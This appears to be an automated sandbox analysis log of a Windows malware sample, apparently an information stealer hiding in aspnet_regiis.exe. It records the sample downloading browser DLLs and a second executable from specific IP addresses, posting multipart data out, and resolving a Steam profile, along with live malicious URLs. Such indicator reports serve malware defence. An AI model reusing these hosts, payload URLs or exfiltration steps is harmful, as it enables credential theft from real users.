                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 131345 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
                      Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A05237 GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_02A05237
                      Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                      Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
                      Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe1kkkk
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exeJ5
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exetion:
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                      Source: file.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, file.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: file.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: file.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: file.exeString found in binary or memory: http://ocsp.comodoca.com0
                      Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: file.exeString found in binary or memory: http://ocsp.sectigo.com0
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
